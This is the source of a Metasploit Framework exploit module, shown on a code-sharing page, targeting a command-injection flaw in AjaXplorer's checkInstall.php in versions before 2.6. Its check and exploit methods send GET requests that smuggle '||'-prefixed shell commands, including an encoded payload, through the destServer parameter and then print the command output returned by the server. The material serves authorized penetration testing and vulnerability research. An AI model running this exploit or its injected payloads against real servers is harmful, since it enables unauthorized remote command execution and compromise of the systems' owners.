Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
24704 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'AjaXplorer checkInstall.php Remote Command Execution',

16
        'Description' => %q{

17
          This module exploits an arbitrary command execution vulnerability in the

18
          AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to

19
          2.6 are vulnerable.

20
        },

21
        'Author' => [

22
          'Julien Cayssol', # Credited according to SecurityFocus

23
          'David Maciejak',  # Metasploit module

24
          'sinn3r'           # Final touch on the Metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2010-10013' ],

29
          [ 'OSVDB', '63552' ],

30
          [ 'BID', '39334' ]

31
        ],

32
        'Privileged' => false,

33
        'Payload' => {

34
          'DisableNops' => true,

35
          'Space' => 512,

36
          'Compat' =>

37
                        {

38
                          'ConnectionType' => 'find',

39
                          'PayloadType' => 'cmd',

40
                          'RequiredCmd' => 'generic perl ruby python telnet'

41
                        }

42
        },

43
        'Platform' => %w{bsd linux osx unix win},

44
        'Arch' => ARCH_CMD,

45
        'Targets' => [[ 'AjaXplorer 2.5.5 or older', {}]],

46
        'DisclosureDate' => '2010-04-04',

47
        'DefaultTarget' => 0,

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])

59
      ]

60
    )

61
  end

62


63
  def check

64
    uri = target_uri.path

65
    uri << '/' if uri[-1, 1] != '/'

66
    clue = Rex::Text::rand_text_alpha(rand(5) + 5)

67


68
    res = send_request_cgi({

69
      'method' => 'GET',

70
      'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),

71
      'vars_get' => {

72
        'destServer' => "||echo #{clue}"

73
      }

74
    })

75


76
    # If the server doesn't return the default redirection, probably something is wrong

77
    if res and res.code == 200 and res.body =~ /#{clue}/

78
      return Exploit::CheckCode::Vulnerable

79
    end

80


81
    return Exploit::CheckCode::Safe

82
  end

83


84
  def exploit

85
    peer = "#{rhost}:#{rport}"

86
    uri = target_uri.path

87


88
    # Trigger the command execution bug

89
    res = send_request_cgi({

90
      'method' => 'GET',

91
      'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),

92
      'vars_get' =>

93
        {

94
          'destServer' => "||#{payload.encoded}"

95
        }

96
    })

97


98
    if res

99
      print_status("The server returned: #{res.code} #{res.message}")

100
      m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''

101


102
      if m.empty?

103
        print_error("This server may not be vulnerable")

104
      else

105
        print_status("Command output from the server:")

106
        print_line(m)

107
      end

108
    end

109
  end

110
end

111


112
=begin

113
Repo:

114
http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/

115
=end

116


117